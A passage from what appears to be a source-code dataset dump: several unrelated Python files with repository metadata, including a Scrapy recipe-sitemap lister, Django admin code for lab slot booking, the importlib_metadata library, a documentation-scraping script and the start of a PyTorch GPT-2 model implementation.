class_name: ConfiguredAssetFilesystemDataConnector
base_directory: {data_path}
glob_directive: "*.csv"
default_regex:
pattern: (.+)\\.csv
group_names:
- name
assets:
users: {{}}
my_runtime_data_connector:
module_name: great_expectations.datasource.data_connector
class_name: RuntimeDataConnector
batch_identifiers:
- pipeline_stage_name
- airflow_run_id
"""
# noinspection PyUnusedLocal
context.test_yaml_config(
name="my_datasource", yaml_config=datasource_config, pretty_print=False
)
# noinspection PyProtectedMember
context._save_project_config()
return context
| 36.397163
| 126
| 0.616329
|
794b28f6197c31aceca25bee0681f8e8ee7a6fb7
| 225
|
py
|
Python
|
tests/edge_walk/auto_gen/data/const.py
|
muzudho/state-machine-py
|
f8f442c88fcc16db07960ffccc5e466bf20d9a11
|
[
"MIT"
] | null | null | null |
tests/edge_walk/auto_gen/data/const.py
|
muzudho/state-machine-py
|
f8f442c88fcc16db07960ffccc5e466bf20d9a11
|
[
"MIT"
] | null | null | null |
tests/edge_walk/auto_gen/data/const.py
|
muzudho/state-machine-py
|
f8f442c88fcc16db07960ffccc5e466bf20d9a11
|
[
"MIT"
] | null | null | null |
MACHINE_A = 'MachineA'
INIT = 'Init'
THIS = 'This'
IS = 'Is'
A = 'A'
GOAL = 'Goal'
E_LOOPBACK = ''
E_THAT = 'that'
E_THIS = 'this'
E_WAS = 'was'
E_IS = 'is'
E_AN = 'an'
E_A = 'a'
E_PIN = 'pin'
E_PEN = 'pen'
E_RETRY = 'retry'
| 13.235294
| 22
| 0.573333
|
794b290e7e3fd9f574ccdd3b0646eab09e7158b8
| 1,530
|
py
|
Python
|
recipes/site_listers/bonappetit.py
|
cfeenstra67/recipes
|
a2d296500b4ff70e11ff3177a1092a033498f82a
|
[
"MIT"
] | null | null | null |
recipes/site_listers/bonappetit.py
|
cfeenstra67/recipes
|
a2d296500b4ff70e11ff3177a1092a033498f82a
|
[
"MIT"
] | null | null | null |
recipes/site_listers/bonappetit.py
|
cfeenstra67/recipes
|
a2d296500b4ff70e11ff3177a1092a033498f82a
|
[
"MIT"
] | null | null | null |
import logging
import re
from typing import Iterator
from urllib.parse import urljoin, urlparse
import scrapy
from lxml import etree
from recipes.site_listers.base import PageCallback, SiteLister
LOGGER = logging.getLogger(__name__)
class BonAppetitLister(SiteLister):
""" """
start_url = "https://www.bonappetit.com/sitemap.xml"
recipe_url_regex = re.compile(r"^/recipe/.+$")
def start_requests(self, page_callback: PageCallback) -> Iterator[scrapy.Request]:
namespaces = {"sm": "http://www.sitemaps.org/schemas/sitemap/0.9"}
def parse_individual_sitemap(response: scrapy.http.Response):
tree = etree.fromstring(response.body)
for location in tree.findall(".//sm:url/sm:loc", namespaces=namespaces):
url = urljoin(response.url, location.text)
parsed_url = urlparse(url)
if not self.recipe_url_regex.search(parsed_url.path):
continue
yield scrapy.Request(url, callback=page_callback)
def parse_sitemap(response: scrapy.http.Response):
tree = etree.fromstring(response.body)
for location in tree.findall(".//sm:sitemap/sm:loc", namespaces=namespaces):
yield scrapy.Request(
urljoin(response.url, location.text),
callback=parse_individual_sitemap,
dont_filter=True,
)
yield scrapy.Request(self.start_url, callback=parse_sitemap, dont_filter=True)
| 34
| 88
| 0.64902
|
794b298d1de13fea56b8459ae3eb0285035d6ea0
| 4,175
|
py
|
Python
|
server/booking_portal/admin/slot.py
|
ujjwal-raizada/lab-booking-system
|
4eed0941104d635d90ed74d31f30e2698474a9ea
|
[
"MIT"
] | null | null | null |
server/booking_portal/admin/slot.py
|
ujjwal-raizada/lab-booking-system
|
4eed0941104d635d90ed74d31f30e2698474a9ea
|
[
"MIT"
] | 5
|
2020-02-02T15:41:48.000Z
|
2020-12-15T08:43:25.000Z
|
server/booking_portal/admin/slot.py
|
ujjwal-raizada/lab-booking-system
|
4eed0941104d635d90ed74d31f30e2698474a9ea
|
[
"MIT"
] | 5
|
2020-01-10T16:29:15.000Z
|
2022-01-07T05:30:19.000Z
|
import datetime
from django.contrib import admin, messages
from django.contrib.auth.decorators import user_passes_test
from django.shortcuts import redirect, render
from django.urls import path
from django.utils.translation import gettext_lazy
from rangefilter.filter import DateRangeFilter
from .. import permissions
from ..forms.admin import BulkCreateSlotsForm
from ..models import Instrument, Slot
class SlotFilterByInstrument(admin.SimpleListFilter):
# Name to be displayed on the admin portal
title = gettext_lazy("Instrument")
parameter_name = 'instrument'
def lookups(self, request, model_admin):
"""Returns a list of tuples. The first element
in each tuple is the coded value for the option
that will appear in the URL query. The second value
is the human-readable name for the option that will
appear in the right side bar"""
return (
(instr.id, gettext_lazy(str(instr)))
for instr in Instrument.objects.all()
)
def queryset(self, request, queryset):
"""Returns the filtered queryset based on the
value provided in the query string and retrievable
via `self.value()`"""
return (
queryset if self.value() is None
else queryset.filter(instrument__id=self.value())
)
class SlotAdmin(admin.ModelAdmin):
change_list_template = "admin/slot_change_list.html"
list_filter = (
('date', DateRangeFilter),
'status',
SlotFilterByInstrument
)
list_display = admin.ModelAdmin.list_display + ('status',)
# 'Add Slot' button is only visible to the admin
def has_add_permission(self, request):
if request.user.is_superuser:
return True
return False
@staticmethod
def time_left(current, end, duration):
"""Checks if a slot can be made with `current time` and
`duration` before the `end time`"""
today = datetime.date.today()
diff = (datetime.datetime.combine(today, end) -
datetime.datetime.combine(today, current))
return diff >= duration
def get_urls(self):
urls = super().get_urls()
info = self.model._meta.app_label, self.model._meta.model_name
my_urls = [
path("bulk-slots/", SlotAdmin.generate_slots, name='%s_%s_bulk-slots_create' % info)
]
return my_urls + urls
@staticmethod
def render_bulk_slots_form(request, form):
payload = {
"form": form,
"opts": Slot._meta,
"has_view_permission": True,
}
return render(request, "admin/bulk_import_slots_form.html", payload)
@staticmethod
@user_passes_test(lambda u: permissions.is_lab_assistant(u) or u.is_superuser)
def generate_slots(request):
"""Bulk Import Slots has a form for creating slots.
This form is restricted to staff.
"""
if request.method == 'POST':
form = BulkCreateSlotsForm(request.POST)
if not form.is_valid():
return SlotAdmin.render_bulk_slots_form(request, form)
instr = form.cleaned_data['instrument']
start_date = form.cleaned_data['start_date']
start_time = form.cleaned_data['start_time']
end_time = form.cleaned_data['end_time']
duration = form.cleaned_data['slot_duration']
day_count = int(form.cleaned_data['for_the_next'])
total, created = Slot.objects.bulk_create_slots(instr, start_date, start_time, end_time, duration,
day_count)
if total == created:
messages.success(request, "All slots were created successfully.")
else:
messages.warning(request, f"{created} out of {total} slots created. Some slots may not have been created"
f" due to clashes with existing slots.")
return redirect("..")
else:
form = BulkCreateSlotsForm()
return SlotAdmin.render_bulk_slots_form(request, form)
| 35.683761
| 121
| 0.631138
|
794b29abeaea6270c86e717d785cbd7e129be793
| 14,746
|
py
|
Python
|
venv/lib/python3.7/site-packages/importlib_metadata/__init__.py
|
melyxlin/sailor-moon-api
|
cb665a15fb5f13632773a0049cf18fec783a1fcd
|
[
"MIT"
] | 6
|
2019-09-02T02:44:44.000Z
|
2020-06-22T12:04:02.000Z
|
venv/lib/python3.7/site-packages/importlib_metadata/__init__.py
|
melyxlin/sailor-moon-api
|
cb665a15fb5f13632773a0049cf18fec783a1fcd
|
[
"MIT"
] | 2
|
2019-12-26T17:31:57.000Z
|
2020-01-06T19:45:26.000Z
|
venv/lib/python3.7/site-packages/importlib_metadata/__init__.py
|
melyxlin/sailor-moon-api
|
cb665a15fb5f13632773a0049cf18fec783a1fcd
|
[
"MIT"
] | 1
|
2019-08-20T18:11:48.000Z
|
2019-08-20T18:11:48.000Z
|
from __future__ import unicode_literals, absolute_import
import io
import os
import re
import abc
import csv
import sys
import zipp
import operator
import functools
import itertools
import collections
from ._compat import (
install,
NullFinder,
ConfigParser,
suppress,
map,
FileNotFoundError,
IsADirectoryError,
NotADirectoryError,
PermissionError,
pathlib,
PYPY_OPEN_BUG,
ModuleNotFoundError,
MetaPathFinder,
email_message_from_string,
)
from importlib import import_module
from itertools import starmap
__metaclass__ = type
__all__ = [
'Distribution',
'PackageNotFoundError',
'distribution',
'distributions',
'entry_points',
'files',
'metadata',
'requires',
'version',
]
class PackageNotFoundError(ModuleNotFoundError):
"""The package was not found."""
class EntryPoint(collections.namedtuple('EntryPointBase', 'name value group')):
"""An entry point as defined by Python packaging conventions.
See `the packaging docs on entry points
<https://packaging.python.org/specifications/entry-points/>`_
for more information.
"""
pattern = re.compile(
r'(?P<module>[\w.]+)\s*'
r'(:\s*(?P<attr>[\w.]+))?\s*'
r'(?P<extras>\[.*\])?\s*$'
)
"""
A regular expression describing the syntax for an entry point,
which might look like:
- module
- package.module
- package.module:attribute
- package.module:object.attribute
- package.module:attr [extra1, extra2]
Other combinations are possible as well.
The expression is lenient about whitespace around the ':',
following the attr, and following any extras.
"""
def load(self):
"""Load the entry point from its definition. If only a module
is indicated by the value, return that module. Otherwise,
return the named object.
"""
match = self.pattern.match(self.value)
module = import_module(match.group('module'))
attrs = filter(None, (match.group('attr') or '').split('.'))
return functools.reduce(getattr, attrs, module)
@property
def extras(self):
match = self.pattern.match(self.value)
return list(re.finditer(r'\w+', match.group('extras') or ''))
@classmethod
def _from_config(cls, config):
return [
cls(name, value, group)
for group in config.sections()
for name, value in config.items(group)
]
@classmethod
def _from_text(cls, text):
config = ConfigParser(delimiters='=')
# case sensitive: https://stackoverflow.com/q/1611799/812183
config.optionxform = str
try:
config.read_string(text)
except AttributeError: # pragma: nocover
# Python 2 has no read_string
config.readfp(io.StringIO(text))
return EntryPoint._from_config(config)
def __iter__(self):
"""
Supply iter so one may construct dicts of EntryPoints easily.
"""
return iter((self.name, self))
class PackagePath(pathlib.PurePosixPath):
"""A reference to a path in a package"""
def read_text(self, encoding='utf-8'):
with self.locate().open(encoding=encoding) as stream:
return stream.read()
def read_binary(self):
with self.locate().open('rb') as stream:
return stream.read()
def locate(self):
"""Return a path-like object for this path"""
return self.dist.locate_file(self)
class FileHash:
def __init__(self, spec):
self.mode, _, self.value = spec.partition('=')
def __repr__(self):
return '<FileHash mode: {} value: {}>'.format(self.mode, self.value)
class Distribution:
"""A Python distribution package."""
@abc.abstractmethod
def read_text(self, filename):
"""Attempt to load metadata file given by the name.
:param filename: The name of the file in the distribution info.
:return: The text if found, otherwise None.
"""
@abc.abstractmethod
def locate_file(self, path):
"""
Given a path to a file in this distribution, return a path
to it.
"""
@classmethod
def from_name(cls, name):
"""Return the Distribution for the given package name.
:param name: The name of the distribution package to search for.
:return: The Distribution instance (or subclass thereof) for the named
package, if found.
:raises PackageNotFoundError: When the named package's distribution
metadata cannot be found.
"""
for resolver in cls._discover_resolvers():
dists = resolver(name)
dist = next(dists, None)
if dist is not None:
return dist
else:
raise PackageNotFoundError(name)
@classmethod
def discover(cls):
"""Return an iterable of Distribution objects for all packages.
:return: Iterable of Distribution objects for all packages.
"""
return itertools.chain.from_iterable(
resolver()
for resolver in cls._discover_resolvers()
)
@staticmethod
def _discover_resolvers():
"""Search the meta_path for resolvers."""
declared = (
getattr(finder, 'find_distributions', None)
for finder in sys.meta_path
)
return filter(None, declared)
@property
def metadata(self):
"""Return the parsed metadata for this Distribution.
The returned object will have keys that name the various bits of
metadata. See PEP 566 for details.
"""
text = (
self.read_text('METADATA')
or self.read_text('PKG-INFO')
# This last clause is here to support old egg-info files. Its
# effect is to just end up using the PathDistribution's self._path
# (which points to the egg-info file) attribute unchanged.
or self.read_text('')
)
return email_message_from_string(text)
@property
def version(self):
"""Return the 'Version' metadata for the distribution package."""
return self.metadata['Version']
@property
def entry_points(self):
return EntryPoint._from_text(self.read_text('entry_points.txt'))
@property
def files(self):
file_lines = self._read_files_distinfo() or self._read_files_egginfo()
def make_file(name, hash=None, size_str=None):
result = PackagePath(name)
result.hash = FileHash(hash) if hash else None
result.size = int(size_str) if size_str else None
result.dist = self
return result
return file_lines and starmap(make_file, csv.reader(file_lines))
def _read_files_distinfo(self):
"""
Read the lines of RECORD
"""
text = self.read_text('RECORD')
return text and text.splitlines()
def _read_files_egginfo(self):
"""
SOURCES.txt might contain literal commas, so wrap each line
in quotes.
"""
text = self.read_text('SOURCES.txt')
return text and map('"{}"'.format, text.splitlines())
@property
def requires(self):
"""Generated requirements specified for this Distribution"""
return self._read_dist_info_reqs() or self._read_egg_info_reqs()
def _read_dist_info_reqs(self):
spec = self.metadata['Requires-Dist']
return spec and filter(None, spec.splitlines())
def _read_egg_info_reqs(self):
source = self.read_text('requires.txt')
return source and self._deps_from_requires_text(source)
@classmethod
def _deps_from_requires_text(cls, source):
section_pairs = cls._read_sections(source.splitlines())
sections = {
section: list(map(operator.itemgetter('line'), results))
for section, results in
itertools.groupby(section_pairs, operator.itemgetter('section'))
}
return cls._convert_egg_info_reqs_to_simple_reqs(sections)
@staticmethod
def _read_sections(lines):
section = None
for line in filter(None, lines):
section_match = re.match(r'\[(.*)\]$', line)
if section_match:
section = section_match.group(1)
continue
yield locals()
@staticmethod
def _convert_egg_info_reqs_to_simple_reqs(sections):
"""
Historically, setuptools would solicit and store 'extra'
requirements, including those with environment markers,
in separate sections. More modern tools expect each
dependency to be defined separately, with any relevant
extras and environment markers attached directly to that
requirement. This method converts the former to the
latter. See _test_deps_from_requires_text for an example.
"""
def make_condition(name):
return name and 'extra == "{name}"'.format(name=name)
def parse_condition(section):
section = section or ''
extra, sep, markers = section.partition(':')
if extra and markers:
markers = '({markers})'.format(markers=markers)
conditions = list(filter(None, [markers, make_condition(extra)]))
return '; ' + ' and '.join(conditions) if conditions else ''
for section, deps in sections.items():
for dep in deps:
yield dep + parse_condition(section)
class DistributionFinder(MetaPathFinder):
"""
A MetaPathFinder capable of discovering installed distributions.
"""
@abc.abstractmethod
def find_distributions(self, name=None, path=None):
"""
Find distributions.
Return an iterable of all Distribution instances capable of
loading the metadata for packages matching the ``name``
(or all names if not supplied) along the paths in the list
of directories ``path`` (defaults to sys.path).
"""
@install
class MetadataPathFinder(NullFinder, DistributionFinder):
"""A degenerate finder for distribution packages on the file system.
This finder supplies only a find_distributions() method for versions
of Python that do not have a PathFinder find_distributions().
"""
def find_distributions(self, name=None, path=None):
"""
Find distributions.
Return an iterable of all Distribution instances capable of
loading the metadata for packages matching the ``name``
(or all names if not supplied) along the paths in the list
of directories ``path`` (defaults to sys.path).
"""
if path is None:
path = sys.path
pattern = '.*' if name is None else re.escape(name)
found = self._search_paths(pattern, path)
return map(PathDistribution, found)
@classmethod
def _search_paths(cls, pattern, paths):
"""Find metadata directories in paths heuristically."""
return itertools.chain.from_iterable(
cls._search_path(path, pattern)
for path in map(cls._switch_path, paths)
)
@staticmethod
def _switch_path(path):
if not PYPY_OPEN_BUG or os.path.isfile(path): # pragma: no branch
with suppress(Exception):
return zipp.Path(path)
return pathlib.Path(path)
@classmethod
def _matches_info(cls, normalized, item):
template = r'{pattern}(-.*)?\.(dist|egg)-info'
manifest = template.format(pattern=normalized)
return re.match(manifest, item.name, flags=re.IGNORECASE)
@classmethod
def _matches_legacy(cls, normalized, item):
template = r'{pattern}-.*\.egg[\\/]EGG-INFO'
manifest = template.format(pattern=normalized)
return re.search(manifest, str(item), flags=re.IGNORECASE)
@classmethod
def _search_path(cls, root, pattern):
if not root.is_dir():
return ()
normalized = pattern.replace('-', '_')
return (item for item in root.iterdir()
if cls._matches_info(normalized, item)
or cls._matches_legacy(normalized, item))
class PathDistribution(Distribution):
def __init__(self, path):
"""Construct a distribution from a path to the metadata directory."""
self._path = path
def read_text(self, filename):
with suppress(FileNotFoundError, IsADirectoryError, KeyError,
NotADirectoryError, PermissionError):
return self._path.joinpath(filename).read_text(encoding='utf-8')
read_text.__doc__ = Distribution.read_text.__doc__
def locate_file(self, path):
return self._path.parent / path
def distribution(package):
"""Get the ``Distribution`` instance for the given package.
:param package: The name of the package as a string.
:return: A ``Distribution`` instance (or subclass thereof).
"""
return Distribution.from_name(package)
def distributions():
"""Get all ``Distribution`` instances in the current environment.
:return: An iterable of ``Distribution`` instances.
"""
return Distribution.discover()
def metadata(package):
"""Get the metadata for the package.
:param package: The name of the distribution package to query.
:return: An email.Message containing the parsed metadata.
"""
return Distribution.from_name(package).metadata
def version(package):
"""Get the version string for the named package.
:param package: The name of the distribution package to query.
:return: The version string for the package as defined in the package's
"Version" metadata key.
"""
return distribution(package).version
def entry_points():
"""Return EntryPoint objects for all installed packages.
:return: EntryPoint objects for all installed packages.
"""
eps = itertools.chain.from_iterable(
dist.entry_points for dist in distributions())
by_group = operator.attrgetter('group')
ordered = sorted(eps, key=by_group)
grouped = itertools.groupby(ordered, by_group)
return {
group: tuple(eps)
for group, eps in grouped
}
def files(package):
return distribution(package).files
def requires(package):
"""
Return a list of requirements for the indicated distribution.
:return: An iterator of requirements, suitable for
packaging.requirement.Requirement.
"""
return distribution(package).requires
__version__ = version(__name__)
| 30.784969
| 79
| 0.63624
|
794b2ac278a7f4a1eaf1963e0a8790a379fb5fbe
| 1,966
|
py
|
Python
|
share/UNCLEAN/parse_ruby.py
|
racker/zeroclickinfo-fathead
|
600fdf04fbf47b4035cc5451f245c87979446754
|
[
"Apache-2.0"
] | 1
|
2021-01-05T16:48:23.000Z
|
2021-01-05T16:48:23.000Z
|
share/UNCLEAN/parse_ruby.py
|
yanirs/zeroclickinfo-fathead
|
c06003560ef3368da5857df301938aad549a7d6b
|
[
"Apache-2.0"
] | null | null | null |
share/UNCLEAN/parse_ruby.py
|
yanirs/zeroclickinfo-fathead
|
c06003560ef3368da5857df301938aad549a7d6b
|
[
"Apache-2.0"
] | 1
|
2016-06-12T06:12:02.000Z
|
2016-06-12T06:12:02.000Z
|
from BeautifulSoup import BeautifulSoup
import re
import os
import sys
import string
openclosetags = re.compile('''<.*?>|</.*?>''',re.DOTALL)
files = []
for file in os.listdir('./docs/ruby/'):
if '_' not in file:
files.append('./docs/ruby/%s'%(file))
for file in files:
filecontents = ''
filecontents = open(file).read()
filecontents = ''.join(filter(lambda x:x in string.printable, filecontents))
soup = BeautifulSoup(filecontents)
name = soup.findAll(attrs={"class":"class-name-in-header"})[0].string
print file
desc = ''
if len(soup.findAll(attrs={"id":"description"})) != 0:
t = soup.findAll(attrs={"id":"description"})[0].findAll('p')
if len(str(t[0])) > 20:
desc = openclosetags.sub('',str(t[0]))
else:
desc = openclosetags.sub('',str(t[1]))
print desc
print
continue
if len(t) == 0:
#print file # dont want these ones
continue
t = t[0]
name = t.findAll('h1')[0].string
desc = openclosetags.sub('',str(t.findAll(attrs={"class":"desc"})[0]).replace("<strong>Description: </strong>",""))
try:
desc = "%s %s"%(desc,openclosetags.sub('',str(t.findAll(attrs={"class":"longdesc"})[0].findAll('p')[0])))
except:
pass
synopsis = ''
try:
synopsis = openclosetags.sub('',str(t.findAll(attrs={"id":"example-0"})[0].findAll('pre')[0]))
synopsis = findjqueryscript.findall(synopsis)[0]
except:
pass
url = "http://api.jquery.com/%s/"%(file.replace("./docs/jquery/","").replace(".html","").replace(".htm",""))
if len(sys.argv) == 1 or sys.argv[1].lower() == 'tsv':
print "%s\t%s\t%s\t%s\t%s\t%s\t%s\t%s"%(name,'',url,desc,'','','jquery','en')
if sys.argv[1].lower() == 'sql':
print '''INSERT INTO functions (`id`, `name`, `namespace`, `url`, `description`, `synopsis`, `detail`, `type`, `lang`) VALUES (NULL, '%s', '%s', '%s', '%s', '%s', '%s', '%s', '%s');'''%(name,'',url,desc.replace("'","''"),synopsis.replace("'","''"),'','jquery','en')
| 30.71875
| 269
| 0.589013
|
794b2af3ce265c1b724eb6e899cc24752b9cff73
| 34,371
|
py
|
Python
|
model/torch_gpt2.py
|
kimhyoil/KoGPT2_Ai_Eassay
|
da7d160f6815dc8ec3dfd635495978409c2a897c
|
[
"MIT"
] | 77
|
2020-04-16T01:42:39.000Z
|
2022-03-09T00:51:23.000Z
|
model/torch_gpt2.py
|
kimhyoil/KoGPT2_Ai_Eassay
|
da7d160f6815dc8ec3dfd635495978409c2a897c
|
[
"MIT"
] | 9
|
2020-04-21T12:45:22.000Z
|
2021-01-29T06:17:19.000Z
|
model/torch_gpt2.py
|
kimhyoil/KoGPT2_Ai_Eassay
|
da7d160f6815dc8ec3dfd635495978409c2a897c
|
[
"MIT"
] | 20
|
2020-04-19T20:56:18.000Z
|
2022-03-09T00:53:20.000Z
|
# coding=utf-8
# Copyright 2018 The OpenAI Team Authors and HuggingFace Inc. team.
# Copyright (c) 2018, NVIDIA CORPORATION. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""PyTorch OpenAI GPT-2 model."""
import logging
import math
import os
import torch
import torch.nn as nn
from torch.nn import CrossEntropyLoss
from torch.nn.functional import gelu
from transformers.configuration_gpt2 import GPT2Config
from transformers.file_utils import add_start_docstrings
from transformers.modeling_utils import Conv1D, PreTrainedModel, SequenceSummary, prune_conv1d_layer
logger = logging.getLogger(__name__)
GPT2_PRETRAINED_MODEL_ARCHIVE_MAP = {
"gpt2": "https://s3.amazonaws.com/models.huggingface.co/bert/gpt2-pytorch_model.bin",
"gpt2-medium": "https://s3.amazonaws.com/models.huggingface.co/bert/gpt2-medium-pytorch_model.bin",
"gpt2-large": "https://s3.amazonaws.com/models.huggingface.co/bert/gpt2-large-pytorch_model.bin",
"gpt2-xl": "https://s3.amazonaws.com/models.huggingface.co/bert/gpt2-xl-pytorch_model.bin",
"distilgpt2": "https://s3.amazonaws.com/models.huggingface.co/bert/distilgpt2-pytorch_model.bin",
}
def load_tf_weights_in_gpt2(model, config, gpt2_checkpoint_path):
""" Load tf checkpoints in a pytorch model
"""
try:
import re
import tensorflow as tf
except ImportError:
logger.error(
"Loading a TensorFlow model in PyTorch, requires TensorFlow to be installed. Please see "
"https://www.tensorflow.org/install/ for installation instructions."
)
raise
tf_path = os.path.abspath(gpt2_checkpoint_path)
logger.info("Converting TensorFlow checkpoint from {}".format(tf_path))
# Load weights from TF model
init_vars = tf.train.list_variables(tf_path)
names = []
arrays = []
for name, shape in init_vars:
logger.info("Loading TF weight {} with shape {}".format(name, shape))
array = tf.train.load_variable(tf_path, name)
names.append(name)
arrays.append(array.squeeze())
for name, array in zip(names, arrays):
name = name[6:] # skip "model/"
name = name.split("/")
pointer = model
for m_name in name:
if re.fullmatch(r"[A-Za-z]+\d+", m_name):
scope_names = re.split(r"(\d+)", m_name)
else:
scope_names = [m_name]
if scope_names[0] == "w" or scope_names[0] == "g":
pointer = getattr(pointer, "weight")
elif scope_names[0] == "b":
pointer = getattr(pointer, "bias")
elif scope_names[0] == "wpe" or scope_names[0] == "wte":
pointer = getattr(pointer, scope_names[0])
pointer = getattr(pointer, "weight")
else:
pointer = getattr(pointer, scope_names[0])
if len(scope_names) >= 2:
num = int(scope_names[1])
pointer = pointer[num]
try:
assert pointer.shape == array.shape
except AssertionError as e:
e.args += (pointer.shape, array.shape)
raise
logger.info("Initialize PyTorch weight {}".format(name))
pointer.data = torch.from_numpy(array)
return model
class Attention(nn.Module):
def __init__(self, nx, n_ctx, config, scale=False):
super().__init__()
self.output_attentions = config.output_attentions
n_state = nx # in Attention: n_state=768 (nx=n_embd)
# [switch nx => n_state from Block to Attention to keep identical to TF implem]
assert n_state % config.n_head == 0
self.register_buffer("bias", torch.tril(torch.ones(n_ctx, n_ctx)).view(1, 1, n_ctx, n_ctx))
self.n_head = config.n_head
self.split_size = n_state
self.scale = scale
self.c_attn = Conv1D(n_state * 3, nx)
self.c_proj = Conv1D(n_state, nx)
self.attn_dropout = nn.Dropout(config.attn_pdrop)
self.resid_dropout = nn.Dropout(config.resid_pdrop)
self.pruned_heads = set()
def prune_heads(self, heads):
if len(heads) == 0:
return
mask = torch.ones(self.n_head, self.split_size // self.n_head)
heads = set(heads) - self.pruned_heads # Convert to set and emove already pruned heads
for head in heads:
# Compute how many pruned heads are before the head and move the index accordingly
head = head - sum(1 if h < head else 0 for h in self.pruned_heads)
mask[head] = 0
mask = mask.view(-1).contiguous().eq(1)
index = torch.arange(len(mask))[mask].long()
index_attn = torch.cat([index, index + self.split_size, index + (2 * self.split_size)])
# Prune conv1d layers
self.c_attn = prune_conv1d_layer(self.c_attn, index_attn, dim=1)
self.c_proj = prune_conv1d_layer(self.c_proj, index, dim=0)
# Update hyper params
self.split_size = (self.split_size // self.n_head) * (self.n_head - len(heads))
self.n_head = self.n_head - len(heads)
self.pruned_heads = self.pruned_heads.union(heads)
def _attn(self, q, k, v, attention_mask=None, head_mask=None):
w = torch.matmul(q, k)
if self.scale:
w = w / math.sqrt(v.size(-1))
nd, ns = w.size(-2), w.size(-1)
b = self.bias[:, :, ns - nd : ns, :ns]
w = w * b - 1e4 * (1 - b)
if attention_mask is not None:
# Apply the attention mask
w = w + attention_mask
w = nn.Softmax(dim=-1)(w)
w = self.attn_dropout(w)
# Mask heads if we want to
if head_mask is not None:
w = w * head_mask
outputs = [torch.matmul(w, v)]
if self.output_attentions:
outputs.append(w)
return outputs
def merge_heads(self, x):
x = x.permute(0, 2, 1, 3).contiguous()
new_x_shape = x.size()[:-2] + (x.size(-2) * x.size(-1),)
return x.view(*new_x_shape) # in Tensorflow implem: fct merge_states
def split_heads(self, x, k=False):
new_x_shape = x.size()[:-1] + (self.n_head, x.size(-1) // self.n_head)
x = x.view(*new_x_shape) # in Tensorflow implem: fct split_states
if k:
return x.permute(0, 2, 3, 1) # (batch, head, head_features, seq_length)
else:
return x.permute(0, 2, 1, 3) # (batch, head, seq_length, head_features)
def forward(self, x, layer_past=None, attention_mask=None, head_mask=None):
x = self.c_attn(x)
query, key, value = x.split(self.split_size, dim=2)
query = self.split_heads(query)
key = self.split_heads(key, k=True)
value = self.split_heads(value)
if layer_past is not None:
past_key, past_value = layer_past[0].transpose(-2, -1), layer_past[1] # transpose back cf below
key = torch.cat((past_key, key), dim=-1)
value = torch.cat((past_value, value), dim=-2)
present = torch.stack((key.transpose(-2, -1), value)) # transpose to have same shapes for stacking
attn_outputs = self._attn(query, key, value, attention_mask, head_mask)
a = attn_outputs[0]
a = self.merge_heads(a)
a = self.c_proj(a)
a = self.resid_dropout(a)
outputs = [a, present] + attn_outputs[1:]
return outputs # a, present, (attentions)
class MLP(nn.Module):
def __init__(self, n_state, config): # in MLP: n_state=3072 (4 * n_embd)
super().__init__()
nx = config.n_embd
self.c_fc = Conv1D(n_state, nx)
self.c_proj = Conv1D(nx, n_state)
self.act = gelu
self.dropout = nn.Dropout(config.resid_pdrop)
def forward(self, x):
h = self.act(self.c_fc(x))
h2 = self.c_proj(h)
return self.dropout(h2)
class Block(nn.Module):
def __init__(self, n_ctx, config, scale=False):
super().__init__()
nx = config.n_embd
self.ln_1 = nn.LayerNorm(nx, eps=config.layer_norm_epsilon)
self.attn = Attention(nx, n_ctx, config, scale)
self.ln_2 = nn.LayerNorm(nx, eps=config.layer_norm_epsilon)
self.mlp = MLP(4 * nx, config)
def forward(self, x, layer_past=None, attention_mask=None, head_mask=None):
output_attn = self.attn(
self.ln_1(x), layer_past=layer_past, attention_mask=attention_mask, head_mask=head_mask
)
a = output_attn[0] # output_attn: a, present, (attentions)
x = x + a
m = self.mlp(self.ln_2(x))
x = x + m
outputs = [x] + output_attn[1:]
return outputs # x, present, (attentions)
class GPT2PreTrainedModel(PreTrainedModel):
""" An abstract class to handle weights initialization and
a simple interface for downloading and loading pretrained models.
"""
config_class = GPT2Config
pretrained_model_archive_map = GPT2_PRETRAINED_MODEL_ARCHIVE_MAP
load_tf_weights = load_tf_weights_in_gpt2
base_model_prefix = "transformer"
def __init__(self, *inputs, **kwargs):
super().__init__(*inputs, **kwargs)
def _init_weights(self, module):
""" Initialize the weights.
"""
if isinstance(module, (nn.Linear, nn.Embedding, Conv1D)):
# Slightly different from the TF version which uses truncated_normal for initialization
# cf https://github.com/pytorch/pytorch/pull/5617
module.weight.data.normal_(mean=0.0, std=self.config.initializer_range)
if isinstance(module, (nn.Linear, Conv1D)) and module.bias is not None:
module.bias.data.zero_()
elif isinstance(module, nn.LayerNorm):
module.bias.data.zero_()
module.weight.data.fill_(1.0)
GPT2_START_DOCSTRING = r""" OpenAI GPT-2 model was proposed in
`Language Models are Unsupervised Multitask Learners`_
by Alec Radford*, Jeffrey Wu*, Rewon Child, David Luan, Dario Amodei** and Ilya Sutskever**.
It's a causal (unidirectional) transformer pre-trained using language modeling on a very large
corpus of ~40 GB of text data.
This model is a PyTorch `torch.nn.Module`_ sub-class. Use it as a regular PyTorch Module and
refer to the PyTorch documentation for all matter related to general usage and behavior.
.. _`Language Models are Unsupervised Multitask Learners`:
https://openai.com/blog/better-language-models/
.. _`torch.nn.Module`:
https://pytorch.org/docs/stable/nn.html#module
Parameters:
config (:class:`~transformers.GPT2Config`): Model configuration class with all the parameters of the model.
Initializing with a config file does not load the weights associated with the model, only the configuration.
Check out the :meth:`~transformers.PreTrainedModel.from_pretrained` method to load the model weights.
"""
GPT2_INPUTS_DOCSTRING = r""" Inputs:
**input_ids**: ``torch.LongTensor`` of shape ``(batch_size, sequence_length)``:
Indices of input sequence tokens in the vocabulary.
GPT-2 is a model with absolute position embeddings so it's usually advised to pad the inputs on
the right rather than the left.
Indices can be obtained using :class:`transformers.GPT2Tokenizer`.
See :func:`transformers.PreTrainedTokenizer.encode` and
:func:`transformers.PreTrainedTokenizer.convert_tokens_to_ids` for details.
**past**:
list of ``torch.FloatTensor`` (one for each layer):
that contains pre-computed hidden-states (key and values in the attention blocks) as computed by the model
(see `past` output below). Can be used to speed up sequential decoding. The token ids which have their past given to this model
should not be passed as input ids as they have already been computed.
**attention_mask**: (`optional`) ``torch.FloatTensor`` of shape ``(batch_size, sequence_length)``:
